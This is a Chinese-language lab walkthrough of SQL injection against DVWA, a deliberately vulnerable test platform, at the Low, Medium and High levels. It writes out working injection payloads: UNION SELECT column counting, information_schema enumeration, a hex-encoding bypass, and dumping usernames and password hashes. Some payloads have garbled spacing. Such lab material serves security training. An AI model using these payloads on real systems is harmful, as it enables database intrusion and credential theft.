DVWA-SQL注入

DVWA是一个基于PHP和MySQL开发的漏洞测试平台

测试环境

应用程序: phpStudy(apache，php，mysql)

测试程序: firefox， new hacker， burpsuite，sqlmap，中国菜刀

一、        SQL注入

SQL注入是指攻击者通过注入恶意的SQL命令，破坏SQL查询语句的结构，从而达到恶意SQL语句的目的。

二、手工注入常规思路

1.判断是否存在注入，注入是字符型还是数字型

2.猜解SQL查询语句中的字段数

3.确定回显位置

4.获取当前数据库

5.获取数据库中的表

6.获取表中的字段名

7.得到数据

三、DVWA注入分析

先将DVWA的级别设置为LOW

1.分析源码，可以看到没有对参数做任何的过滤，直接带入数据库进行查询，分析sql查询语句，可能存在字符型sq1注入

2.判断sql是否存在注入，以及注入的类型。1’and’1’=’1

3.猜测SQL查询语句中的字段数，1’order  by  1#

1’order  by  2#

1’order  by  3#

从上面两个图可以看出，SQL语句查询的表字段数是2，确定显示的位置(SQL语句查询之后的回显位置)

1’union select  1,2#从下图中可以看到有两个回显

查询当前的数据库，以及版本

1’union select  version(),database() #

获取数据库中的表，1’union select  1，group_concat(table_name) from information_schema.tables where table_schema=database ()#

获取表中的字段名，1’union  select  1，group_concat(column_name) from information_schema.columns where table_name=’users’#

获取字段中的数据，1’union  select  user,password from users#

将DVWA的级别设置为Medium

中级加入了一些防御，不让用户输入，只提供选择(可用burpsuit抓包来绕过)，分析源码可以看到对参数的使用mysql_real_escape_string函数转义sql语句中的一些特殊字符，查看sql查询语句可以看出可能存在数字型sql注入。

通过burpsuit抓包，修改数据包，绕过防御。判断注入点，以及注入的类型，下图可以看到，存在注入，注入类型是数字型注入。1 and 1=1#

猜解sql查询语句中的字段的个数，测试字段个数1，1 order by

1#

测试字段个数2，1 order by 2#

测试字段个数3，1 order by 3#。返回错误页面， 所以字段数为2

确定回显的位置，下图可以说明有2个回显位置，1 union select 1,2#

获取当前数据库的名称以及版本，

union select database(), version()#

获取数据库中的所有表，1 union select 1, group_ concat (table_ name) frominformation_ schema. tables where table_ schema=database()#

获取表中的所有字段名，考虑到单引号被转义，可以利用16 进制进行绕过。1union select 1, group_ concat (column_ name) from information_ schema. col umnswhere table_ name=0x7573657273#

获取字段中的数据，1union se lect user, password from users#

将DVWA的级别设置为High

将dvwa设置为高级，可以看出，点击”here to change your ID”，页面自动跳转，防御了自动化的SQL注入，分析源码可以看到，对参数没有做防御，在sql查询语句中限制了查询条数，可以通过burpsuit抓包，修改数据包实现绕过。

点开链接显示下图

发送1

查看源码

获得密码，1’ union select user, password from users#

将DVWA的级别设置为Impossible,分析源码可以看到使用了PD0技术，杜绝了SQL注入。